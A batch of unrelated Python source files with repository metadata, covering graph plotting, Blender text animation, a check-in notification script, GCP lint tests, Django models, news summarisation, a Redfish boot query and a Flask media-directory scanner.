PythonExercicios/ex107/teste.py
|
Lucas-ns/Python-3-Curso-Em-Video
|
f6d338fffd7a4606d34fab09634eea0fe4b3dfb3
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex107/teste.py
|
Lucas-ns/Python-3-Curso-Em-Video
|
f6d338fffd7a4606d34fab09634eea0fe4b3dfb3
|
[
"MIT"
] | null | null | null |
from ex107 import moeda
p = float(input('Digite o preço: R$'))
print(f'A metade de R${p} é R${moeda.metade(p)}')
print(f'O dobro de R${p} é R${moeda.dobro(p)}')
print(f'Aumentando 10%, temos R${moeda.aumentar(p, 10)}')
print(f'Reduzindo 13%, temos R${moeda.diminuir(p, 13)}')
| 34.625
| 57
| 0.66065
|
b4ca505f4a1703410cd6a9d76b8634be4ee3c006
| 1,004
|
py
|
Python
|
SLpackage/private/thirdparty/pythonpkgs/networkx/networkx_2.2/share/doc/networkx-2.2/examples/drawing/plot_weighted_graph.py
|
fanglab/6mASCOPE
|
3f1fdcb7693ff152f17623ce549526ec272698b1
|
[
"BSD-3-Clause"
] | 5
|
2022-02-20T07:10:02.000Z
|
2022-03-18T17:47:53.000Z
|
SLpackage/private/thirdparty/pythonpkgs/networkx/networkx_2.2/share/doc/networkx-2.2/examples/drawing/plot_weighted_graph.py
|
fanglab/6mASCOPE
|
3f1fdcb7693ff152f17623ce549526ec272698b1
|
[
"BSD-3-Clause"
] | null | null | null |
SLpackage/private/thirdparty/pythonpkgs/networkx/networkx_2.2/share/doc/networkx-2.2/examples/drawing/plot_weighted_graph.py
|
fanglab/6mASCOPE
|
3f1fdcb7693ff152f17623ce549526ec272698b1
|
[
"BSD-3-Clause"
] | null | null | null |
#! python
"""
==============
Weighted Graph
==============
An example using Graph as a weighted network.
"""
# Author: Aric Hagberg (hagberg@lanl.gov)
import matplotlib.pyplot as plt
import networkx as nx
G = nx.Graph()
G.add_edge('a', 'b', weight=0.6)
G.add_edge('a', 'c', weight=0.2)
G.add_edge('c', 'd', weight=0.1)
G.add_edge('c', 'e', weight=0.7)
G.add_edge('c', 'f', weight=0.9)
G.add_edge('a', 'd', weight=0.3)
elarge = [(u, v) for (u, v, d) in G.edges(data=True) if d['weight'] > 0.5]
esmall = [(u, v) for (u, v, d) in G.edges(data=True) if d['weight'] <= 0.5]
pos = nx.spring_layout(G) # positions for all nodes
# nodes
nx.draw_networkx_nodes(G, pos, node_size=700)
# edges
nx.draw_networkx_edges(G, pos, edgelist=elarge,
width=6)
nx.draw_networkx_edges(G, pos, edgelist=esmall,
width=6, alpha=0.5, edge_color='b', style='dashed')
# labels
nx.draw_networkx_labels(G, pos, font_size=20, font_family='sans-serif')
plt.axis('off')
plt.show()
| 24.487805
| 75
| 0.618526
|
80c74151ecb20f7f6e0f1b242f0304370e857b4e
| 6,021
|
py
|
Python
|
coldtype/blender/__init__.py
|
ruohoruotsi/coldtype
|
13993e5a4fa3f99c6800fed2496bd5a374e4f53f
|
[
"Apache-2.0"
] | null | null | null |
coldtype/blender/__init__.py
|
ruohoruotsi/coldtype
|
13993e5a4fa3f99c6800fed2496bd5a374e4f53f
|
[
"Apache-2.0"
] | null | null | null |
coldtype/blender/__init__.py
|
ruohoruotsi/coldtype
|
13993e5a4fa3f99c6800fed2496bd5a374e4f53f
|
[
"Apache-2.0"
] | null | null | null |
# to be loaded from within Blender
import os, math
from coldtype.geometry.rect import Rect
from coldtype.pens.datpen import DATPen, DATPens
from coldtype.pens.blenderpen import BlenderPen, BPH
from coldtype.time import Frame, Timeline
from coldtype.renderable import renderable
from coldtype.renderable.animation import animation
from coldtype.blender.render import blend_source
try:
import bpy
except ImportError:
bpy = None
pass
def b3d(collection, callback=None, plane=False, dn=False):
pen_mod = None
if callback and not callable(callback):
pen_mod = callback[0]
callback = callback[1]
def _cast(pen:DATPen):
if bpy and pen_mod:
pen_mod(pen)
pen.add_data("b3d", dict(
collection=collection,
callback=callback))
return _cast
def b3d_mod(callback):
def _cast(pen:DATPen):
if bpy:
callback(pen)
return _cast
class b3d_mods():
@staticmethod
def center(r:Rect):
return b3d_mod(lambda p:
p.translate(-r.w/2, -r.h/2))
def centerx(r:Rect):
return b3d_mod(lambda p:
p.translate(-r.w/2, 0))
def centery(r:Rect):
return b3d_mod(lambda p:
p.translate(0, -r.h/2))
def walk_to_b3d(result:DATPens, dn=False):
def walker(p:DATPen, pos, data):
if pos == 0:
bdata = p.data.get("b3d")
if bdata:
coll = BPH.Collection(bdata["collection"])
if bdata.get("plane"):
bp = p.cast(BlenderPen).draw(coll, plane=True)
else:
bp = p.cast(BlenderPen).draw(coll, dn=dn)
if bdata.get("callback"):
bdata.get("callback")(bp)
bp.hide(not p._visible)
result.walk(walker)
class b3d_renderable(renderable):
pass
class b3d_animation(animation):
def __init__(self, rect=(1080, 1080), **kwargs):
self.func = None
self.name = None
self.current_frame = -1
super().__init__(rect=rect, **kwargs)
if bpy:
bpy.data.scenes[0].frame_end = self.t.duration-1
# don't think this is totally accurate but good enough for now
if isinstance(self.t.fps, float):
bpy.data.scenes[0].render.fps = round(self.t.fps)
bpy.data.scenes[0].render.fps_base = 1.001
else:
bpy.data.scenes[0].render.fps = self.t.fps
bpy.data.scenes[0].render.fps_base = 1
def post_read(self):
super().post_read()
if bpy:
bpy.data.scenes[0].render.filepath = str(self.blender_output_dir()) + "/"
def blender_output_dir(self):
output_dir = self.output_folder / "_blender"
output_dir.mkdir(parents=True, exist_ok=True)
return output_dir
def blender_render(self, file, blend_file, artifacts, samples=4):
output_dir = self.blender_output_dir()
for a in artifacts[:]:
if a.render == self:
blend_source(
file,
blend_file,
a.i,
output_dir,
samples=samples)
os.system("afplay /System/Library/Sounds/Pop.aiff")
def blender_render_frame(self, file, blend_file, fi, samples=4):
blend_source(file, blend_file, fi, self.blender_output_dir(), samples)
def blender_rendered_preview(self):
if bpy: return
from coldtype.img.skiaimage import SkiaImage
@animation(self.rect, timeline=self.timeline, preview_only=1, sort=1000)
def blender_preview(f):
try:
out = self.blender_output_dir()
return SkiaImage(out / "{:04d}.png".format(f.i))
except:
pass
return blender_preview
if __name__ == "<run_path>":
from coldtype.text.composer import StSt, Font
from coldtype.color import hsl
fnt = Font.Cacheable("~/Type/fonts/fonts/PappardelleParty-VF.ttf")
@b3d_renderable()
def draw_bg(r):
return DATPens([
(DATPen(r.inset(0, 0)).f(hsl(0.85, 1, 0.7))
.tag("BG2")
.chain(b3d("Text", plane=1)))])
@b3d_animation(timeline=Timeline(60, 30), bg=0, layer=1, rstate=1)
def draw_dps(f, rs):
if bpy:
bpy.data.objects['Light'].rotation_euler[2] = f.e("l", rng=(0, math.radians(360)), to1=0)
centroid = BPH.AddOrFind("Centroid",
lambda: bpy.ops.object.empty_add(type="PLAIN_AXES"))
centroid.location = (5.4, 5.4, 0)
centroid.rotation_euler[2] = f.e("l", rng=(0, math.radians(360)), to1=0)
if False: # if you want to render in a multi-plexed fashion
if not bpy and not rs.previewing:
draw_dps.blender_render_frame("scratch.blend", f.i)
txt = (StSt("ABCDEFG", fnt, 330, palette=0)
.align(f.a.r)
.collapse()
.map(lambda i, p: p.explode())
.collapse()
.pmap(lambda i,p: p
.declare(fa:=f.adj(-i*1))
.cond(p.ambit().y > 570, lambda pp:
pp.translate(0, fa.e("seio", 2, rng=(50, 0))))
.cond(p.ambit().mxy < 490, lambda pp:
pp.translate(0, fa.e("seio", 2, rng=(-50, 0))))
.tag(f"Hello{i}")
.chain(b3d_mods.center(f.a.r))
.chain(b3d("Text", lambda bp: bp
.extrude(fa.e("eeio", 1, rng=(0.25, 2)))
.metallic(1)))))
return DATPens([txt])
previewer = draw_dps.blender_rendered_preview()
#def build(artifacts):
# draw_dps.blender_render("scratch.blend", artifacts[:1], samples=8)
#def release(artifacts):
# draw_dps.blender_render("scratch.blend", artifacts, samples=8)
| 31.52356
| 101
| 0.555057
|
8e13297e4ab1e532d2d8d742e702fdd96cd24e72
| 930
|
py
|
Python
|
push_main-pushplus.py
|
Weidows/AutoMihoyoBBS
|
62df3ffe306b6be742f75050d854293f4ac10483
|
[
"MIT"
] | 338
|
2021-05-23T14:06:29.000Z
|
2022-03-31T13:46:44.000Z
|
push_main-pushplus.py
|
Weidows/AutoMihoyoBBS
|
62df3ffe306b6be742f75050d854293f4ac10483
|
[
"MIT"
] | 59
|
2021-06-08T10:29:14.000Z
|
2022-03-30T12:19:11.000Z
|
push_main-pushplus.py
|
Weidows/AutoMihoyoBBS
|
62df3ffe306b6be742f75050d854293f4ac10483
|
[
"MIT"
] | 129
|
2021-06-19T10:42:36.000Z
|
2022-03-31T12:58:48.000Z
|
import sys
import time
import random
import subprocess
from request import http
SendKey = ""
send_Url = "http://www.pushplus.plus/send"
python_Path = sys.executable
run_ShellCommand = python_Path + " main_multi.py autorun"
for i in range(2):
opt_id, opt_info = subprocess.getstatusoutput(run_ShellCommand)
if opt_id == 0:
break
time.sleep(random.randint(30, 70))
if opt_id != 0:
print("Error!")
http.post(
url=send_Url,
data={
"token": SendKey,
"title": "「米游社-签到」Error!",
"content": opt_info.split()[-1] + "\nHello!推送相关的设置已修改,请注意更新!\n这里是运行相关日志:\r\n" + opt_info,
}
)
else:
print("OK!")
http.post(
url=send_Url,
data={
"token": SendKey,
"title": "「米游社-签到」OK!",
"content": opt_info.split()[-1] + "\nHello!推送相关的设置已修改,请注意更新!\n这里是运行相关日志:\r\n" + opt_info,
}
)
exit(0)
| 22.682927
| 101
| 0.57957
|
011d82da4840fcb2683d0d0b66de7d1df52bc644
| 3,224
|
py
|
Python
|
gcpdiag/lint/command_test.py
|
eyalzek/gcpdiag
|
0378898dc407271741de33fb56f59aebf905292b
|
[
"Apache-2.0"
] | null | null | null |
gcpdiag/lint/command_test.py
|
eyalzek/gcpdiag
|
0378898dc407271741de33fb56f59aebf905292b
|
[
"Apache-2.0"
] | null | null | null |
gcpdiag/lint/command_test.py
|
eyalzek/gcpdiag
|
0378898dc407271741de33fb56f59aebf905292b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test code in command.py."""
from gcpdiag import lint
from gcpdiag.lint import command
class Test:
"""Unit tests for command."""
# pylint: disable=protected-access
def test_flatten_multi_arg(self):
assert list(command._flatten_multi_arg([])) == []
assert list(command._flatten_multi_arg(['*BP*'])) == ['*BP*']
assert list(command._flatten_multi_arg(['*BP*',
'*ERR*'])) == ['*BP*', '*ERR*']
assert list(command._flatten_multi_arg(['*BP*,*ERR*'])) == ['*BP*', '*ERR*']
assert list(command._flatten_multi_arg(['*BP*, *ERR*'
])) == ['*BP*', '*ERR*']
# pylint: disable=protected-access
def test_init_args_parser(self):
parser = command._init_args_parser()
args = parser.parse_args(['--project', 'myproject'])
assert args.project == 'myproject'
assert args.billing_project is None
assert args.auth_adc is False
assert args.auth_key is None
assert args.auth_oauth is False
assert args.verbose == 0
assert args.within_days == 3
assert args.include is None
assert args.exclude is None
assert args.include_extended is False
assert args.config is None
assert args.show_skipped is False
assert args.hide_ok is False
assert args.logging_ratelimit_requests is None
assert args.logging_ratelimit_period_seconds is None
assert args.logging_page_size is None
assert args.logging_fetch_max_entries is None
assert args.logging_fetch_max_time_seconds is None
# pylint: disable=protected-access
def test_provided_init_args_parser(self):
parser = command._init_args_parser()
args = parser.parse_args(['--project', 'myproject', '--include', '*ERR*'])
assert args.include == ['*ERR*']
args = parser.parse_args(['--project', 'myproject', '--exclude', '*BP*'])
assert args.exclude == ['*BP*']
args = parser.parse_args(['--project', 'myproject', '--include-extended'])
assert args.include_extended is True
args = parser.parse_args(
['--project', 'myproject', '--config', '/path/to/file'])
assert args.config == '/path/to/file'
# pylint: disable=protected-access
def test_load_repository_rules(self):
repo = lint.LintRuleRepository()
command._load_repository_rules(repo)
modules = {r.product for r in repo.rules}
assert 'gke' in modules
assert 'gcb' in modules
assert 'gaes' in modules
assert 'gce' in modules
assert 'iam' in modules
assert 'apigee' in modules
assert 'composer' in modules
assert 'dataproc' in modules
assert 'gcs' in modules
assert 'gcf' in modules
| 38.380952
| 80
| 0.67897
|
2a679c9754dc54e38dee6cf3f3e0c47c1ae0b64c
| 567
|
py
|
Python
|
archivable_model/tests/models.py
|
martinfaucheux/django-archving
|
9b1cc056c2f6e92fa42e31079a5f87037deef4e0
|
[
"MIT"
] | 1
|
2022-01-19T19:03:53.000Z
|
2022-01-19T19:03:53.000Z
|
archivable_model/tests/models.py
|
martinfaucheux/django-archiving
|
9b1cc056c2f6e92fa42e31079a5f87037deef4e0
|
[
"MIT"
] | null | null | null |
archivable_model/tests/models.py
|
martinfaucheux/django-archiving
|
9b1cc056c2f6e92fa42e31079a5f87037deef4e0
|
[
"MIT"
] | null | null | null |
from archivable_model.models import ArchivableModel
from django.db import models
class Author(ArchivableModel):
name = models.CharField(max_length=100, blank=True)
def __str__(self):
return self.name
class Category(ArchivableModel):
name = models.CharField(max_length=100, blank=True)
def __str__(self):
return self.name
class Article(ArchivableModel):
author = models.ForeignKey(Author, on_delete=models.CASCADE)
category = models.ForeignKey(
Category, on_delete=models.CASCADE, null=True, default=None
)
| 22.68
| 67
| 0.728395
|
d620390fa83d9db3fdf5653864b67b076993bb9b
| 4,964
|
py
|
Python
|
UHACK/summaryKeywords.py
|
rajatrawataku1/Thiknpad
|
ae62efde9520c54ab8d2dd9164815609c1abf67c
|
[
"MIT"
] | null | null | null |
UHACK/summaryKeywords.py
|
rajatrawataku1/Thiknpad
|
ae62efde9520c54ab8d2dd9164815609c1abf67c
|
[
"MIT"
] | null | null | null |
UHACK/summaryKeywords.py
|
rajatrawataku1/Thiknpad
|
ae62efde9520c54ab8d2dd9164815609c1abf67c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: iso-8859-15 -*-
# from __future__ import absolute_import
# from __future__ import division, unicode_literals
import newspaper
from newspaper import Article
from nltk import word_tokenize, pos_tag, ne_chunk
import unicodedata
from nltk import word_tokenize, pos_tag, ne_chunk
from summy import lets_summarize
from nltk.chunk import conlltags2tree, tree2conlltags
from nltk.sentiment.vader import SentimentIntensityAnalyzer
#import googleImages
import re
# from sumy.parsers.html import HtmlParser
# from sumy.parsers.plaintext import PlaintextParser
# from sumy.nlp.tokenizers import Tokenizer
# from sumy.summarizers.lsa import LsaSummarizer as Summarizer
# from sumy.nlp.stemmers import Stemmer
# from sumy.utils import get_stop_words
# LANGUAGE = "english"
# SENTENCES_COUNT = 5
#
#
# def lets_summarize(url):
# parser = HtmlParser.from_url(url, Tokenizer(LANGUAGE))
# # or for plain text files
# # parser = PlaintextParser.from_file("document.txt", Tokenizer(LANGUAGE))
# stemmer = Stemmer(LANGUAGE)
# summary = []
# summarizer = Summarizer(stemmer)
# summarizer.stop_words = get_stop_words(LANGUAGE)
#
# for sentence in summarizer(parser.document, SENTENCES_COUNT):
# summary.append(sentence)
# return summary
def get_senti(text):
sid = SentimentIntensityAnalyzer()
ss = sid.polarity_scores(text)
return ss
def entity(article,keys):
buzzwords = []
sentence = article
def remove_non_ascii(text):
return ''.join([i if ord(i) < 128 else ' ' for i in text])
buzzwords = []
buzzwords_type = []
sen = remove_non_ascii(sentence)
chunks = ne_chunk(pos_tag(word_tokenize(sen)))
iob_tagged = tree2conlltags(chunks)
size = len(iob_tagged)
k = 0
for i in range(0,size):
if iob_tagged[i][2] != 'O':
sums = unicodedata.normalize('NFKD', iob_tagged[i][0]).encode('ascii','ignore')
sums = sums.lower()
buzzwords.append(sums)
sums = unicodedata.normalize('NFKD', iob_tagged[i][2]).encode('ascii','ignore')
sums = sums.lower()
words = sums.split('-')
buzzwords_type.append(words[1])
k += 1
return buzzwords,buzzwords_type
def extract_keywords(article,url1):
article.download()
article.parse()
article.nlp()
summary = article.summary
if summary == '':
summary = lets_summarize(url1)
#summar = []
#summary = unicodedata.normalize('NFKD', summary).encode('ascii','ignore')
#summary = ''.join([i if ord(i) < 128 else ' ' for i in summary])
size = len(summary)
summary = str(summary)
#print type(summary)
#words = word_tokenize(str(summary))
words = summary.split(' ')
#print words
to_remove = ['[<Sentence:',"{u'article':",'\n','<Sentence:']
summary = []
for wor in words:
if wor not in to_remove:
summary.append(wor)
summary = ' '.join(summary)
#words = summary.split('\n')
summary = re.sub('[^a-zA-Z0-9 \n/\.]', '', summary)
#print words
#print summary
keys = []
for i in range(0,size):
sums = unicodedata.normalize('NFKD', article.keywords[i]).encode('ascii','ignore')
keys.append(sums)
used = []
buzzwords,buzzwords_type = entity(article.text,keys)
i = 0
gpe = []
people = []
organization = []
random = []
for best in buzzwords:
if best in keys:
if best in used:
continue
used.append(best)
if buzzwords_type[i]== 'gpe' or buzzwords_type[i]== 'geo':
gpe.append(best)
elif buzzwords_type[i] == 'person' or buzzwords_type[i]=='per':
people.append(best)
elif buzzwords_type[i] == 'organization'or buzzwords_type[i]=='org':
organization.append(best)
else :
random.append(best)
i += 1
sentiment = get_senti(article.text)
if sentiment['compound'] > 0.4 :
sent = 'Positive'
elif sentiment['compound'] < -0.4:
sent = 'Negative'
else:
sent = 'Neutral'
#links = googleImages.googleImg(keys);
output = {
'summary': summary,
'people':people,
'place':gpe,
'organization':organization,
'random':random,
'sentiment_prob':sentiment,
'all_keywords':keys,
'sentiment': sent,
#'images':links
}
#print type(output)
#print output['summary']
return output
def runFinal(url1 = "http://localhost:8082"):
article = Article(url = url1)
output = extract_keywords(article,url1)
return output
| 31.417722
| 94
| 0.591056
|
0a7de2a74606abf1a9046300ef1883c3da710358
| 4,022
|
py
|
Python
|
examples/get_server_boot_once.py
|
lenovo/lenovo-python-redfish
|
a2d2608aa33ee5087b62bf46695394571a1aaad9
|
[
"Apache-2.0"
] | null | null | null |
examples/get_server_boot_once.py
|
lenovo/lenovo-python-redfish
|
a2d2608aa33ee5087b62bf46695394571a1aaad9
|
[
"Apache-2.0"
] | null | null | null |
examples/get_server_boot_once.py
|
lenovo/lenovo-python-redfish
|
a2d2608aa33ee5087b62bf46695394571a1aaad9
|
[
"Apache-2.0"
] | null | null | null |
###
#
# Lenovo Redfish examples - Get the current System Boot Once target
#
# Copyright Notice:
#
# Copyright 2018 Lenovo Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
###
import sys
import json
import redfish
from redfish import redfish_logger
import traceback
import lenovo_utils as utils
def get_server_boot_once(ip, login_account, login_password, system_id):
"""Get server boot once item
:params ip: BMC IP address
:type ip: string
:params login_account: BMC user name
:type login_account: string
:params login_password: BMC user password
:type login_password: string
:params system_id: ComputerSystem instance id(None: first instance, All: all instances)
:type system_id: None or string
:returns: returns server boot once item when succeeded or error message when failed
"""
result = {}
login_host = "https://" + ip
try:
# Connect using the BMC address, account name, and password
# Create a REDFISH object
REDFISH_OBJ = redfish.redfish_client(base_url=login_host, username=login_account, timeout=utils.g_timeout,
password=login_password, default_prefix='/redfish/v1', cafile=utils.g_CAFILE)
# Login into the server and create a session
REDFISH_OBJ.login(auth=utils.g_AUTH)
except:
traceback.print_exc()
result = {'ret': False, 'msg': "Please check the username, password, IP is correct"}
return result
# GET the ComputerSystem resource
boot_details = []
system = utils.get_system_url("/redfish/v1", system_id, REDFISH_OBJ)
if not system:
result = {'ret': False, 'msg': "This system id is not exist or system member is None"}
REDFISH_OBJ.logout()
return result
for i in range(len(system)):
system_url = system[i]
response_system_url = REDFISH_OBJ.get(system_url, None)
if response_system_url.status == 200:
# Get the response
boot_server = {}
properties = ['BootSourceOverrideEnabled', 'BootSourceOverrideMode', 'BootSourceOverrideTarget']
for property in properties:
if property in response_system_url.dict["Boot"]:
boot_server[property] = response_system_url.dict["Boot"][property]
boot_details.append(boot_server)
else:
result = {'ret': False, 'msg': "response_system_url Error code %s" % response_system_url.status}
REDFISH_OBJ.logout()
return result
result['ret'] = True
result['entries'] = boot_details
# Logout of the current session
try:
REDFISH_OBJ.logout()
except:
pass
return result
if __name__ == '__main__':
# Get parameters from config.ini and/or command line
argget = utils.create_common_parameter_list()
args = argget.parse_args()
parameter_info = utils.parse_parameter(args)
# Get connection info from the parameters user specified
ip = parameter_info['ip']
login_account = parameter_info["user"]
login_password = parameter_info["passwd"]
system_id = parameter_info['sysid']
# Get server boot once item and check result
result = get_server_boot_once(ip, login_account, login_password, system_id)
if result['ret'] is True:
del result['ret']
sys.stdout.write(json.dumps(result['entries'], sort_keys=True, indent=2))
else:
sys.stderr.write(result['msg'])
sys.exit(1)
| 36.563636
| 122
| 0.676032
|
c45099f96c09dc8c07e63762efabe5630df491b7
| 652
|
py
|
Python
|
ch01/creativity/c_1_14.py
|
walshification/dsap
|
85c62ec663fda13283fc0a2ab5c567387cadac02
|
[
"MIT"
] | null | null | null |
ch01/creativity/c_1_14.py
|
walshification/dsap
|
85c62ec663fda13283fc0a2ab5c567387cadac02
|
[
"MIT"
] | null | null | null |
ch01/creativity/c_1_14.py
|
walshification/dsap
|
85c62ec663fda13283fc0a2ab5c567387cadac02
|
[
"MIT"
] | null | null | null |
"""
Write a short Python function that takes a sequence of integer values
and determines if there is a distinct pair of numbers in the sequence
whose product is odd.
"""
from typing import List
def has_odd_product_pair(data: List[int]) -> bool:
"""Returns True if data contains a distinct pair of numbers whose
product is odd.
"""
data_length = len(data)
# End at data_length - 1 because the last index gets checked by all the others.
for k in range(data_length - 1):
for j in range(k + 1, data_length):
if (data[k] * data[j]) % 2 == 1 and data[k] != data[j]:
return True
return False
| 31.047619
| 83
| 0.656442
|
c4341227c83a72f5ff783fa3c176dec6d3fcf6cb
| 1,132
|
py
|
Python
|
tests/test_youtube.py
|
santosderek/Vitality
|
cc90d3b561c3b75f000288345d7a1442fb2b3fec
|
[
"MIT"
] | 1
|
2020-09-18T17:08:53.000Z
|
2020-09-18T17:08:53.000Z
|
tests/test_youtube.py
|
santosderek/Vitality
|
cc90d3b561c3b75f000288345d7a1442fb2b3fec
|
[
"MIT"
] | 91
|
2020-09-25T23:12:58.000Z
|
2020-12-19T04:57:50.000Z
|
tests/test_youtube.py
|
santosderek/4155-Team
|
cc90d3b561c3b75f000288345d7a1442fb2b3fec
|
[
"MIT"
] | 3
|
2020-09-26T22:35:42.000Z
|
2020-10-13T18:22:22.000Z
|
from vitality.youtube import *
from os import environ, getenv
from os.path import exists
from vitality.settings import GOOGLE_MAPS_KEY
from dotenv import load_dotenv
from time import sleep
import pytest
@pytest.mark.skip
def test_search_topic():
sleep(.5)
load_dotenv('.env')
youtube = Youtube(getenv("GOOGLE_YOUTUBE_KEY"))
response = youtube.search_topic('Low Carb Recipe')
assert len(response) == 6
assert 'items' in response
assert 'etag' in response
# from pprint import pprint
# pprint (response)
# assert False
def test_fallback_dicts():
assert 'kind' in DEFAULT_YOUTUBE_WORKOUT_SEARCH
assert 'etag' in DEFAULT_YOUTUBE_WORKOUT_SEARCH
assert 'nextPageToken' in DEFAULT_YOUTUBE_WORKOUT_SEARCH
assert 'regionCode' in DEFAULT_YOUTUBE_WORKOUT_SEARCH
assert 'pageInfo' in DEFAULT_YOUTUBE_WORKOUT_SEARCH
assert 'kind' in DEFAULT_YOUTUBE_DIET_SEARCH
assert 'etag' in DEFAULT_YOUTUBE_DIET_SEARCH
assert 'nextPageToken' in DEFAULT_YOUTUBE_DIET_SEARCH
assert 'regionCode' in DEFAULT_YOUTUBE_DIET_SEARCH
assert 'pageInfo' in DEFAULT_YOUTUBE_DIET_SEARCH
| 33.294118
| 60
| 0.772085
|
67e6e03ea6343564fe83ac2bc7fdb918be00e963
| 6,818
|
py
|
Python
|
JavHelper/views/scan_directory.py
|
SteVeNRK/JAVOneStop
|
eb93339e4250b85cf055c434d8e32941dc404248
|
[
"MIT"
] | 1
|
2021-12-02T06:44:25.000Z
|
2021-12-02T06:44:25.000Z
|
JavHelper/views/scan_directory.py
|
SteVeNRK/JAVOneStop
|
eb93339e4250b85cf055c434d8e32941dc404248
|
[
"MIT"
] | null | null | null |
JavHelper/views/scan_directory.py
|
SteVeNRK/JAVOneStop
|
eb93339e4250b85cf055c434d8e32941dc404248
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
import os
import json
from ast import literal_eval
from flask import Blueprint, jsonify, request, Response
from JavHelper.core.OOF_downloader import OOFDownloader
from JavHelper.core.javlibrary import JavLibraryScraper
from JavHelper.core import IniNotFoundException
from JavHelper.core.file_scanner import EmbyFileStructure
from JavHelper.core.ini_file import load_ini_file, return_config_string, set_value_ini_file, return_default_config_string
from JavHelper.core.nfo_parser import EmbyNfo
"""
This endpoint is pretty dangerous since it needs permission to r/w no-app directory
"""
directory_scan = Blueprint('directory_scan', __name__, url_prefix='/directory_scan')
@directory_scan.route('/remove_existing_tag', methods=['GET'])
def remove_existing_tag():
"""
This endpoint is used to scan javs already exist locally and update db
"""
emby_folder = EmbyFileStructure(return_default_config_string('file_path'))
# scan folder
emby_folder.remove_tags()
return 'ok'
@directory_scan.route('/rescan_emby_folder', methods=['GET'])
def rescan_emby_folder():
"""
This endpoint is used to scan javs already exist locally and update db
"""
emby_folder = EmbyFileStructure(return_default_config_string('file_path'))
# scan folder
emby_folder.scan_emby_root_path()
return jsonify({'success': [jav_obj['directory'] for jav_obj in emby_folder.file_list]})
@directory_scan.route('/verify_local_nfo', methods=['GET'])
def verify_local_nfo():
directory = request.args.get('directory')
filename = request.args.get('filename')
root = return_default_config_string('file_path')
# special processing to convert linux db path to windows
directory = directory.replace('/', os.sep).replace('\\', os.sep)
print(os.path.join(root, directory, filename))
whether_exists = os.path.isfile(os.path.join(root, directory, filename))
return jsonify({'success': whether_exists})
@directory_scan.route('/update_oof_cookies', methods=['POST'])
def update_oof_cookies():
req_data = json.loads(request.get_data() or '{}')
update_dict = json.loads(req_data['update_dict'])
status = OOFDownloader.update_local_cookies(update_dict)
return jsonify({'status': status})
@directory_scan.route('/update_javlib_cf_cookies', methods=['POST'])
def update_javlib_cf_cookies():
req_data = json.loads(request.get_data() or '{}')
update_dict = json.loads(req_data['update_dict'])
status = JavLibraryScraper.update_local_cookies(update_dict)
return jsonify({'status': status})
@directory_scan.route('/read_oof_cookies', methods=['GET'])
def read_oof_cookies():
return jsonify({'oof_cookies': OOFDownloader.load_local_cookies(
return_all=request.args.get('return_all', False)
)}) # convert returned obj to dict format
@directory_scan.route('/read_javlib_cf_cookies', methods=['GET'])
def read_javlib_cf_cookies():
return jsonify({'javlib_cf_cookies': JavLibraryScraper.load_local_cookies(
return_all=request.args.get('return_all', False)
)}) # convert returned obj to dict format
@directory_scan.route('/update_local_ini', methods=['POST'])
def update_local_ini():
req_data = json.loads(request.get_data() or '{}')
update_dict = req_data['update_dict']
status = set_value_ini_file(update_dict)
return jsonify({'status': status})
@directory_scan.route('/read_local_ini', methods=['GET'])
def read_local_ini():
if request.args.get('filter_dict'):
res = {}
errors = []
filter_dict = literal_eval(request.args.get('filter_dict'))
for k, v in filter_dict.items():
try:
res[k] = return_config_string(v)
except IniNotFoundException as e:
errors.append(str(e))
return jsonify({'local_config': res, 'error': errors})
else:
return jsonify({'local_config': load_ini_file()._sections}) # convert returned obj to dict format
@directory_scan.route('/rename_path_preview', methods=['GET'])
def rename_path_preview():
path = request.args.get('path')
# handle usual error
if not os.path.exists(path):
return jsonify({'response': [{'file_name': f'{path} does not exist'}]}), 400
if not os.path.isdir(path):
return jsonify({'response': [{'file_name': f'{path} is not a valid directory for scan'}]}), 400
res = EmbyFileStructure(path).rename_directory_preview()
return jsonify({'response': res,
'header': [
{'name': 'Current File Name', 'selector': 'file_name', 'sortable': True},
{'name': 'New File Name', 'selector': 'new_file_name', 'sortable': True}
]})
@directory_scan.route('/rename_path_on_json', methods=['POST'])
def rename_path_on_json():
req_data = json.loads(request.get_data() or '{}')
file_objs = req_data['file_objs']
path = req_data['path']
# handle usual error
if not os.path.exists(path):
return jsonify({'response': [{'file_name': f'{path} does not exist'}]}), 400
if not os.path.isdir(path):
return jsonify({'response': [{'file_name': f'{path} is not a valid directory for scan'}]}), 400
def long_process():
for each_file_process in EmbyFileStructure.rename_directory(path, file_objs):
yield json.dumps({'log': each_file_process})+'\n'
return Response(long_process(), mimetype='text/event-stream')
@directory_scan.route('/pre_scan_files', methods=['GET'])
def pre_scan_files():
path = request.args.get('path')
file_list = []
# handle usual error
if not os.path.exists(path):
return jsonify({'response': [{'file_name': f'{path} does not exist'}]}), 400
if not os.path.isdir(path):
return jsonify({'response': [{'file_name': f'{path} is not a valid directory for scan'}]}), 400
for file_name in os.listdir(path):
# filter out dot file
if file_name.startswith('.'):
continue
# don't care about directory size
elif os.path.isdir(os.path.join(path, file_name)):
#file_list.append({'file_name': file_name, 'size': 'folder - will not process'})
# longer care about directory, just skip them
pass
else:
file_size = os.path.getsize(os.path.join(path, file_name)) >> 20
_car = os.path.splitext(file_name)[0]
file_list.append({'file_name': file_name, 'car': _car, 'size': f'{file_size}MB'})
return jsonify({'response': file_list,
'header': [
{'name': 'File Name', 'selector': 'file_name', 'sortable': True},
{'name': 'Size', 'selector': 'size', 'sortable': True}
]
})
| 38.089385
| 121
| 0.668378
|
e89f6cf79359ebf18e77c74e8c212a846c3cc711
| 6,899
|
py
|
Python
|
